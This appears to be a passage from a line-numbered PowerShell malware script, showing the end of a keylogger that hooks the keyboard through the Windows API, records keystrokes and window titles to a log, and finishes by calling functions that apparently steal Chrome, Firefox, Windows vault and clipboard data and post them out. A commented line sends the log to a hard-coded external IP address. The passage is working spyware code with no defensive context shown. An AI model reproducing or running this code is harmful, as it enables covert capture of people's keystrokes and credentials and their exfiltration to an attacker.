1303 | # Hack since Export-CSV doesn't have an append switch in PSv2 | |
1304 | $CSVEntry = ($obj | Select-Object Key,Window,Time | ConvertTo-Csv -NoTypeInformation)[1]+'[]nl' | |
1305 | #Invoke-WebRequest -uri "http://45.79.173.232:9002/log" -Method POST -Body $JSON | |
1306 | Out-File -FilePath $LogPath -Append -InputObject $CSVEntry -Encoding unicode | |
1307 | } | |
1308 | return $CallNextHookEx.Invoke([IntPtr]::Zero, $Code, $wParam, $lParam) | |
1309 | } | |
1310 | ||
1311 | # Cast scriptblock as LowLevelKeyboardProc callback | |
1312 | $Delegate = Get-DelegateType @([Int32], [IntPtr], [IntPtr]) ([IntPtr]) | |
1313 | $Callback = $CallbackScript -as $Delegate | |
1314 | ||
1315 | # Get handle to PowerShell for hook | |
1316 | $PoshModule = (Get-Process -Id $PID).MainModule.ModuleName | |
1317 | $ModuleHandle = $GetModuleHandle.Invoke($PoshModule) | |
1318 | ||
1319 | # Set WM_KEYBOARD_LL hook | |
1320 | $Hook = $SetWindowsHookEx.Invoke(0xD, $Callback, $ModuleHandle, 0) | |
1321 | ||
1322 | $Stopwatch = [Diagnostics.Stopwatch]::StartNew() | |
1323 | ||
1324 | while ($true) { | |
1325 | if ($PSBoundParameters.Timeout -and ($Stopwatch.Elapsed.TotalMinutes -gt $Timeout)) { break } | |
1326 | $PeekMessage.Invoke([IntPtr]::Zero, [IntPtr]::Zero, 0x100, 0x109, 0) | |
1327 | Start-Sleep -Milliseconds 10 | |
1328 | } | |
1329 | ||
1330 | $Stopwatch.Stop() | |
1331 | ||
1332 | # Remove the hook | |
1333 | $UnhookWindowsHookEx.Invoke($Hook) | |
1334 | } | |
1335 | ||
1336 | # Setup KeyLogger's runspace | |
1337 | $PowerShell = [PowerShell]::Create() | |
1338 | [void]$PowerShell.AddScript($Script) | |
1339 | [void]$PowerShell.AddArgument($LogPath) | |
1340 | if ($PSBoundParameters.Timeout) { [void]$PowerShell.AddArgument($Timeout) } | |
1341 | ||
1342 | # Start KeyLogger | |
1343 | [void]$PowerShell.BeginInvoke() | |
1344 | ||
1345 | if ($PassThru.IsPresent) { return $PowerShell } | |
1346 | } | |
1347 | ||
1348 | Get-Keystrokes; Title-Monitor; WebGet; GetChrome; GetFF; GetVault; Gclip; WebPost |